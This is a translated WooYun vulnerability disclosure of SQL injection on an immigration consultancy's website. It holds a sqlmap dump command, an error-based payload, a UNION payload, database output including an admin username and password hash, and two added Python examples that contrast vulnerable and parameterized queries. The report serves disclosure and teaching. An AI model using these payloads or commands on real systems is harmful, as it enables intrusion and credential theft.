
Vulnerability summary

Defect ID: wooyun-2015-0156884

Title: SQL injection in the main site of 御国天下移民顾问有限公司 (admin password disclosure) (Hong Kong region)

Vendor: 御国天下移民顾问有限公司

Author: 路人甲

Submitted: 2015-12-01 11:35

Fix time: 2016-01-16 11:00

Public: 2016-01-16 11:00

Type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: handed to a third-party partner organisation (HKCERT, the Hong Kong Computer Emergency Response Team Coordination Centre) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-12-01: details sent to the vendor, awaiting vendor handling
2015-12-02: vendor confirmed; details visible to the vendor only
2015-12-12: details opened to core white hats and domain experts
2015-12-22: details opened to regular white hats
2016-01-01: details opened to intern white hats
2016-01-16: details opened to the public

Summary:

The main site of 御国天下移民顾问有限公司 has an SQL injection vulnerability (admin password disclosure).

Details:

Injection point: http://**.**.**.**/about.php?aid=9 (GET parameter aid). The sqlmap command used to confirm it and dump the php_members table:

$ python sqlmap.py -u "http://**.**.**.**/about.php?aid=9" -p aid --technique=BE --random-agent --batch  -D worldvisa -T php_members -C username,password,qq,telephone,email,alipay,mobile --dump
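The command asks sqlmap for boolean-based (B) and error-based (E) techniques, and the proof below shows it settled on error-based. The following is an added example, not code from the report or from sqlmap, showing what that payload does and how a value comes back through a MySQL error. The error strings in it are constructed to match the shape MySQL produces for the FLOOR(RAND(0)*2) GROUP BY trick; the second one uses the hash from the report's dump purely as sample data, and nothing here contacts a live host.

```python
"""Added example, not code from the WooYun report: what the error-based
payload sqlmap used (--technique=E) actually does, and how data comes back
through a MySQL error message.

Assumptions, labelled as such: the error strings below are constructed to
match the shape MySQL produces for the FLOOR(RAND(0)*2) ... GROUP BY trick;
nothing here talks to a live host.
"""
import re
from typing import Optional

# The two marker hex literals from the payload on this page.
PREFIX_HEX = "0x71626a6b71"
SUFFIX_HEX = "0x7171626271"


def decode_hex_literal(lit: str) -> str:
    """Decode a MySQL hex literal (0x...) to the ASCII text it stands for."""
    return bytes.fromhex(lit[2:]).decode("ascii")


PREFIX = decode_hex_literal(PREFIX_HEX)   # 'qbjkq'
SUFFIX = decode_hex_literal(SUFFIX_HEX)   # 'qqbbq'


def build_error_payload(base: str, inner_select: str,
                        prefix_hex: str = PREFIX_HEX,
                        suffix_hex: str = SUFFIX_HEX,
                        n: int = 8311) -> str:
    """Rebuild the payload structure sqlmap used, with any inner SELECT.

    FLOOR(RAND(0)*2) is deterministic (0,1,1,0,1,1,...). Grouping COUNT(*) on a
    key that contains it collides on the repeated 1, so MySQL aborts with
    "Duplicate entry '<prefix><value><suffix>1' for key ..." and whatever the
    inner SELECT returned is echoed back between the markers. The trailing
    AND 'knoB'='knoB re-closes the quoted context the parameter sits in.
    """
    return (
        f"{base}' AND (SELECT {n} FROM(SELECT COUNT(*),CONCAT({prefix_hex},"
        f"({inner_select}),{suffix_hex},FLOOR(RAND(0)*2))x FROM "
        f"INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'knoB'='knoB"
    )


def extract_from_error(error_text: str,
                       prefix: str = PREFIX, suffix: str = SUFFIX) -> Optional[str]:
    """Pull the smuggled value out of an error message, or None if absent.

    Matching on the markers rather than on the full message keeps this
    independent of the exact wording ("for key 1" on old MySQL, "for key
    'group_key'" on newer ones).
    """
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), error_text, re.S)
    return m.group(1) if m else None


# Constructed sample errors (not captured from the target). The first is what
# the detection payload on this page, ELT(8311=8311,1), would produce; the
# second is what a follow-up query for the php_members password column would
# look like, using the hash value shown in the report's dump as sample data.
DETECTION_ERROR = "Duplicate entry 'qbjkq1qqbbq1' for key 'group_key'"
DUMP_ERROR = ("Duplicate entry "
              "'qbjkqd6a74d5ead4c725ed869d90d5660991eqqbbq1' for key 'group_key'")


def demo() -> dict:
    """Run the pieces end to end and return the results for inspection."""
    return {
        "prefix": PREFIX,
        "suffix": SUFFIX,
        "detection_value": extract_from_error(DETECTION_ERROR),
        "dumped_password": extract_from_error(DUMP_ERROR),
        "no_marker": extract_from_error("You have an error in your SQL syntax"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The random markers are what make the technique robust: sqlmap does not parse the whole error text, it only looks for its own prefix and suffix, so the same extractor works whether the server returns the raw MySQL message or wraps it in an application error page, as long as some part of the message reaches the response.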

Proof:

---
Parameter: aid (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: aid=9' AND (SELECT 8311 FROM(SELECT COUNT(*),CONCAT(0x71626a6b71,(SELECT (ELT(8311=8311,1))),0x7171626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'knoB'='knoB
---
web application technology: Apache
back-end DBMS: MySQL 5.0
current user: 'worldvisa_f@localhost'
current user is DBA: False
database management system users [1]:
[*] 'worldvisa_f'@'localhost'
Database: worldvisa
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| php_product | 292 |
| php_product_dir | 102 |
| php_service | 33 |
| php_menu | 15 |
| php_link | 12 |
| php_down_dir | 9 |
| php_feedback | 9 |
| php_comment_list | 7 |
| php_mpb | 7 |
| php_article_dir | 6 |
| php_article_include | 6 |
| php_photo_dir | 6 |
| php_about | 5 |
| php_groups | 5 |
| php_about_include | 3 |
| php_case_include | 3 |
| php_down | 3 |
| php_news | 3 |
| php_news_dir | 3 |
| php_news_include | 3 |
| php_plugins | 3 |
| php_product_include | 3 |
| php_article | 2 |
| php_article_dir_include | 2 |
| php_blog_logs | 2 |
| php_blog_logs_dir | 2 |
| php_blog_photo_dir | 2 |
| php_down_dir_include | 2 |
| php_down_include | 2 |
| php_link_include | 2 |
| php_mpb_dir | 2 |
| php_person | 2 |
| php_photo | 2 |
| php_product_orders | 2 |
| php_stat | 2 |
| php_about_setup | 1 |
| php_ad | 1 |
| php_blog_logs_dir_include | 1 |
| php_blog_logs_include | 1 |
| php_blog_setup | 1 |
| php_case | 1 |
| php_case_dir | 1 |
| php_case_dir_include | 1 |
| php_comment | 1 |
| php_contact | 1 |
| php_contact_include | 1 |
| php_guest | 1 |
| php_members | 1 |
| php_mpb_dir_include | 1 |
| php_mpb_include | 1 |
| php_news_dir_include | 1 |
| php_person_include | 1 |
| php_photo_dir_include | 1 |
| php_photo_include | 1 |
| php_product_dir_include | 1 |
| php_resource | 1 |
| php_resource_dir | 1 |
| php_resource_dir_include | 1 |
| php_resource_include | 1 |
| php_service_include | 1 |
| php_setup | 1 |
| php_smtpmail | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 1671 |
| SESSION_VARIABLES | 329 |
| GLOBAL_VARIABLES | 317 |
| GLOBAL_STATUS | 312 |
| SESSION_STATUS | 312 |
| STATISTICS | 229 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 197 |
| COLLATIONS | 197 |
| PARTITIONS | 115 |
| TABLES | 115 |
| KEY_COLUMN_USAGE | 75 |
| TABLE_CONSTRAINTS | 75 |
| CHARACTER_SETS | 39 |
| PLUGINS | 23 |
| SCHEMA_PRIVILEGES | 18 |
| ENGINES | 9 |
| SCHEMATA | 2 |
| PROCESSLIST | 1 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+


Database: worldvisa
Table: php_product
[292 entries] (rows not reproduced in the report)

Database: worldvisa
Table: php_members
[38 columns]
+--------------+-----------------------+
| Column | Type |
+--------------+-----------------------+
| address | varchar(150) |
| adminid | tinyint(1) |
| alipay | varchar(80) |
| available | tinyint(2) |
| avatar | varchar(150) |
| bday | varchar(10) |
| bmonth | varchar(10) |
| byear | varchar(10) |
| city | varchar(50) |
| content | text |
| credits | int(10) |
| edulevel | varchar(30) |
| email | varchar(50) |
| gender | tinyint(1) |
| groupid | smallint(6) unsigned |
| homepage | varchar(100) |
| idcard | varchar(80) |
| idtype | varchar(30) |
| income | varchar(30) |
| industry | varchar(30) |
| invisible | tinyint(1) |
| lastactivity | int(10) unsigned |
| lastpost | int(10) unsigned |
| mobile | varchar(50) |
| msn | varchar(80) |
| occupation | varchar(30) |
| oltime | smallint(6) unsigned |
| pageviews | mediumint(8) unsigned |
| password | varchar(32) |
| postid | varchar(20) |
| posts | mediumint(8) unsigned |
| qq | varchar(15) |
| regdate | int(10) unsigned |
| regip | varchar(15) |
| telephone | varchar(50) |
| truename | varchar(100) |
| uid | mediumint(8) unsigned |
| username | varchar(15) |
+--------------+-----------------------+
Database: worldvisa
Table: php_members
[1 entry]
+----------+----------------------------------+---------+-----------+---------+---------+---------+
| username | password | qq | telephone | email | alipay | mobile |
+----------+----------------------------------+---------+-----------+---------+---------+---------+
| 020jt | d6a74d5ead4c725ed869d90d5660991e | <blank> | <blank> | <blank> | <blank> | <blank> |
+----------+----------------------------------+---------+-----------+---------+---------+---------+

Fix:

Filter and validate the aid parameter (it is an article id, so reject anything but a decimal integer), and rather than relying on filtering alone, bind it through a prepared statement so it can never be spliced into the query text. The dumped password column is varchar(32) holding a 32-hex-character value, consistent with an unsalted MD5 hash; the admin credential should be reset and stored with a salted, slow password hash.

Copyright: please credit 路人甲@乌云 when reposting.
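The report does not show about.php itself, but the closing quote in the payload (aid=9') tells you the parameter lands inside a quoted string literal in concatenated SQL. The following added example (not the site's code) reconstructs that pattern next to a hardened version; sqlite3 stands in for MySQL, the table and column names come from the sqlmap output above, and the rows are constructed.

```python
"""Added example, not the site's code (the report does not show about.php):
the string-built query the aid=9' payload implies, next to a hardened version.

Assumptions, labelled: sqlite3 stands in for MySQL, table and column names are
taken from the sqlmap output on this page, and the rows are constructed.
"""
import re
import sqlite3

LEAKED_HASH = "d6a74d5ead4c725ed869d90d5660991e"   # value from the report's dump


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the worldvisa database with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE php_about (aid INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("CREATE TABLE php_members (uid INTEGER PRIMARY KEY, "
                 "username TEXT, password TEXT)")
    conn.execute("INSERT INTO php_about VALUES (9, 'About us')")
    conn.execute("INSERT INTO php_members VALUES (1, '020jt', ?)", (LEAKED_HASH,))
    conn.commit()
    return conn


def about_vulnerable(conn: sqlite3.Connection, aid: str) -> list:
    """Splices the raw parameter into a quoted literal: the bug class on this page.

    The attacker's quote ends the literal and everything after it is parsed
    as SQL, which is exactly what sqlmap's aid=9' AND ... probe relies on.
    """
    sql = "SELECT title FROM php_about WHERE aid='" + aid + "'"
    return [row[0] for row in conn.execute(sql)]


def about_safe(conn: sqlite3.Connection, aid: str) -> list:
    """Validate the shape of the input, then bind it; never build SQL from it."""
    # aid is an article id: a short string of ASCII digits and nothing else.
    if not re.fullmatch(r"[0-9]{1,9}", aid):
        raise ValueError("aid must be a decimal integer")
    # The placeholder keeps the value out of the SQL text entirely, so even a
    # value that slipped past validation could not change the query's structure.
    return [row[0] for row in conn.execute(
        "SELECT title FROM php_about WHERE aid=?", (int(aid),))]


def safe_rejects(conn: sqlite3.Connection, aid: str) -> bool:
    """True if the hardened handler refuses the input."""
    try:
        about_safe(conn, aid)
    except ValueError:
        return True
    return False


# A UNION payload of the kind the injection point admits: close the literal,
# append a SELECT against php_members, comment out the dangling quote.
UNION_PAYLOAD = "9' UNION SELECT password FROM php_members--"


def run_demo() -> dict:
    """Exercise both handlers on normal input and on the payload."""
    db = make_db()
    return {
        "vuln_normal": about_vulnerable(db, "9"),
        "vuln_payload": about_vulnerable(db, UNION_PAYLOAD),
        "safe_normal": about_safe(db, "9"),
        "safe_rejects_payload": safe_rejects(db, UNION_PAYLOAD),
        "safe_rejects_normal": safe_rejects(db, "9"),
    }


if __name__ == "__main__":
    for k, v in run_demo().items():
        print(f"{k}: {v}")
```

With the vulnerable handler the UNION payload returns the member's password hash alongside the page title; the hardened handler refuses the payload at validation and, even if validation were loosened, the bound parameter could only ever be compared against aid. Validation and binding are complementary: the first gives a clean error for bad input, the second removes the injection class regardless of what the filter lets through.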


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed: 2015-12-02 10:58

Vendor reply:

Referred to related parties.

Latest status:

None yet